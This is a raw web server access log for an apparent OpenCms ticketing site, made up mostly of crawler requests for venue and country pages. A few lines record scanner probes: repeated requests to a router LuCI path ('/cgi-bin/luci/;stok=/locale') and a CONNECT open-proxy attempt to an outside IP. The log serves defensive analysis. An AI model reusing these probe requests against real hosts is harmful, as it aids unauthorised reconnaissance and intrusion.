66.249.66.162 - - [18/Feb/2025:12:06:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=C0984F56-34B3-2410-35BD-6A54606EFEFB HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:12:06:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=1D2AF5BD-A881-D22D-AE7C-E22D0AA83910 HTTP/1.1" 200 93013
141.255.166.90 - - [18/Feb/2025:12:07:24 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
66.249.66.160 - - [18/Feb/2025:12:07:35 +0100] "GET /ticket2/opencms/en/venue/?venueid=2EFE9339-3EE6-E1A3-A76E-4A84BA1E2E4F HTTP/1.1" 200 63657
66.249.66.162 - - [18/Feb/2025:12:08:39 +0100] "GET /ticket2/opencms/en/venue/?countryid=6B694798-0B8F-37B1-435B-6B5A0DB8B5CB HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:12:14:18 +0100] "GET /ticket2/opencms/en/venue/?countryid=38CC08E3-88E5-726B-7780-E55017C79604 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:12:14:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=E8C1CB18-01B3-A5D8-BA63-2D05631C3548 HTTP/1.1" 200 93013
185.242.226.109 - - [18/Feb/2025:12:16:55 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.242.226.109 - - [18/Feb/2025:12:16:55 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
193.68.89.51 - - [18/Feb/2025:12:19:25 +0100] "GET / HTTP/1.1" 404 -
66.249.66.160 - - [18/Feb/2025:12:21:22 +0100] "GET /ticket2/opencms/en/venue/?venueid=E7FBE66B-7C5F-E919-4130-134662E3910C HTTP/1.1" 200 63624
66.249.66.160 - - [18/Feb/2025:12:21:30 +0100] "GET /ticket2/opencms/en/venue/?venueid=DB39254B-3E28-48BE-15E1-03374B8325A4 HTTP/1.1" 200 63648
66.249.66.161 - - [18/Feb/2025:12:29:32 +0100] "GET /ticket2/opencms/en/venue/?venueid=8A17268F-190C-08C5-2317-BAB591EDC85C HTTP/1.1" 200 63679
66.249.66.162 - - [18/Feb/2025:12:33:38 +0100] "GET /ticket2/opencms/en/venue/?countryid=A9198A40-C385-3F3F-F1E3-C36DF8CBA8BE HTTP/1.1" 200 93013
46.105.70.190 - - [18/Feb/2025:12:34:33 +0100] "GET / HTTP/1.1" 404 -
46.105.70.190 - - [18/Feb/2025:12:34:44 +0100] "GET / HTTP/1.1" 404 -
46.105.70.190 - - [18/Feb/2025:12:35:21 +0100] "GET / HTTP/1.1" 404 -
46.105.70.190 - - [18/Feb/2025:12:35:35 +0100] "GET / HTTP/1.1" 404 -
161.35.171.209 - - [18/Feb/2025:12:42:10 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
64.23.169.46 - - [18/Feb/2025:12:46:11 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
66.249.66.161 - - [18/Feb/2025:12:47:36 +0100] "GET /ticket2/opencms/en/venue/?venueid=076920E1-F452-B8E6-450C-A259979AD263 HTTP/1.1" 200 63607
193.68.89.10 - - [18/Feb/2025:12:48:31 +0100] "GET / HTTP/1.1" 404 -
66.249.66.160 - - [18/Feb/2025:12:49:22 +0100] "GET /ticket2/opencms/en/venue/?venueid=725EAA96-3504-C885-60D8-51C3C379F292 HTTP/1.1" 200 63687
66.249.66.161 - - [18/Feb/2025:12:49:38 +0100] "GET /ticket2/opencms/en/venue/?venueid=689B24E3-EC07-27D9-31E9-D3BC81562DCF HTTP/1.1" 200 63610
156.229.232.48 - - [18/Feb/2025:12:50:43 +0100] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 -
114.119.153.152 - - [18/Feb/2025:12:51:53 +0100] "GET /ticket2/opencms/en/venue/?venueid=93DAAAF3-1B74-84EC-84B9-59E298EE51A3 HTTP/1.1" 200 63634
141.255.166.90 - - [18/Feb/2025:12:53:37 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:12:53:38 +0100] "GET /ticket2/opencms/en/venue/?venueid=D865EDC3-A8C8-8107-EEAE-35A140CA5350 HTTP/1.1" 200 63642
66.249.66.162 - - [18/Feb/2025:12:54:35 +0100] "GET /ticket2/opencms/en/venue/?venueid=E687CB5D-1F58-A3FC-2BFA-4F29DD5C8850 HTTP/1.1" 200 63607
66.249.66.162 - - [18/Feb/2025:12:57:36 +0100] "GET /ticket2/opencms/en/venue/?venueid=9EFDE8EF-581C-D81F-842B-7194E2AD230B HTTP/1.1" 200 63649
66.249.66.160 - - [18/Feb/2025:12:58:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=7A0460DD-50B2-C9A6-7233-3106FD73A000 HTTP/1.1" 200 93013
193.68.89.51 - - [18/Feb/2025:12:58:18 +0100] "GET / HTTP/1.1" 404 -
66.249.66.160 - - [18/Feb/2025:12:58:18 +0100] "GET /ticket2/opencms/en/venue/?venueid=15F8136B-CA21-08A9-E12F-B2DEA2740D74 HTTP/1.1" 200 63613
66.249.66.161 - - [18/Feb/2025:13:03:22 +0100] "GET /ticket2/opencms/en/venue/?venueid=01D585F0-8906-9A4C-36CC-65BD1235CC9B HTTP/1.1" 200 63645
66.249.66.160 - - [18/Feb/2025:13:03:27 +0100] "GET /ticket2/opencms/en/venue/?venueid=FFAD140D-D3E3-13F5-E204-505E06314019 HTTP/1.1" 200 63609
66.249.66.160 - - [18/Feb/2025:13:03:42 +0100] "GET /ticket2/opencms/en/venue/?venueid=950EE001-B436-52E3-8102-457AB519569A HTTP/1.1" 200 63643
88.1.103.19 - - [18/Feb/2025:13:07:11 +0100] "GET / HTTP/1.0" 404 -
66.249.66.161 - - [18/Feb/2025:13:09:36 +0100] "GET /ticket2/opencms/en/venue/?venueid=9113985D-44E1-D6AA-8893-307E961DB223 HTTP/1.1" 200 63685
